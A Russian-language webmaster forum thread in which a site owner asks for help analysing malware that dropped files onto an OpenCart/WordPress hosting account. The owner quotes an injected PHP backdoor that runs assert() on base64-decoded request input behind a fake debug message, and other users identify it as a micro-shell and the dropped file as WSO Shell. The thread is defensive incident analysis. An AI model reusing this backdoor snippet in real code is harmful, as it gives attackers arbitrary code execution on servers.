Зловред

Trafim6021

Постоялец
Регистрация
20 Ноя 2013
Сообщения
564
Реакции
132
  • Автор темы
  • Заблокирован
  • #1
Свеженький зловред. Буду рад если кто-то разберет что он делает.
В корне сайта появляется два файла.
gopni3g.zip и 756fe38ca6.php а так же в рандомных папках rss_feeder.class.php

Дальнейшие действия не известны. Мониторинг файлов прислал смску что появились новые файлы и они были экспроприированы с сервера.
Сейчас сижу изучаю логи, как оно туда попало.

А ещё в некоторые php файлы добавился код
Код:
if ( $_REQUEST["array"] )
{   

    @assert(base64_decode($_REQUEST["array"]));   
    //debug message
    echo "Array sort completed";
    exit();
}
 

Вложения

  • атеншон.zip
    33,8 KB · Просмотры: 7
Последнее редактирование:

ZiX

Коддинг, Парсинг
Регистрация
9 Июл 2011
Сообщения
1.378
Реакции
707
Свеженький зловред. Буду рад если кто-то разберет что он делает.
В корне сайта появляется два файла.
gopni3g.zip и 756fe38ca6.php а так же в рандомных папках rss_feeder.class.php

Дальнейшие действия не известны. Мониторинг файлов прислал смску что появились новые файлы и они были экспроприированы с сервера.
Сейчас сижу изучаю логи, как оно туда попало.

А ещё в некоторые php файлы добавился код
Код:
if ( $_REQUEST["array"] )
{  

    @assert(base64_decode($_REQUEST["array"]));  
    //debug message
    echo "Array sort completed";
    exit();
}
Какой движок?
 

Trafim6021

Постоялец
Регистрация
20 Ноя 2013
Сообщения
564
Реакции
132
  • Автор темы
  • Заблокирован
  • #3
Опенкарт и Вордпресс на этом аккаунте который заразился.

В логах вижу периодическое обращение к этим файлам с разных айпишников.
 
Последнее редактирование:

Jim_Di

Писатель
Регистрация
29 Июн 2012
Сообщения
7
Реакции
6
rss_feeder.class.php - это WSO Shell 2.5
дополнительно можешь заблокировать доступ до Для просмотра ссылки Войди или Зарегистрируйся и подать абузу - оттуда качает тебе хрень.
 

latteo

Эффективное использование PHP, MySQL
Регистрация
27 Фев 2008
Сообщения
1.603
Реакции
1.565
php-код c assert - микрошелл, позволяет выполнить произвольный код на вашем хостинг акке

756fe38ca6.php - скачивает и распаковывает gopni3g.zip с домена Для просмотра ссылки Войди или Зарегистрируйся

gopni3g.zip - увы пустой, потому как Для просмотра ссылки Войди или Зарегистрируйся в дауне, так что не известно что из него проинсталили.
Если найдёте у себя с размером отличным от 0 выкладывайте.
 

Nei

Nosce te ipsum
Команда форума
Модератор
Регистрация
5 Сен 2009
Сообщения
688
Реакции
603

Вложения

  • gopni3g.zip
    30,2 KB · Просмотры: 3

latteo

Эффективное использование PHP, MySQL
Регистрация
27 Фев 2008
Сообщения
1.603
Реакции
1.565
Сверху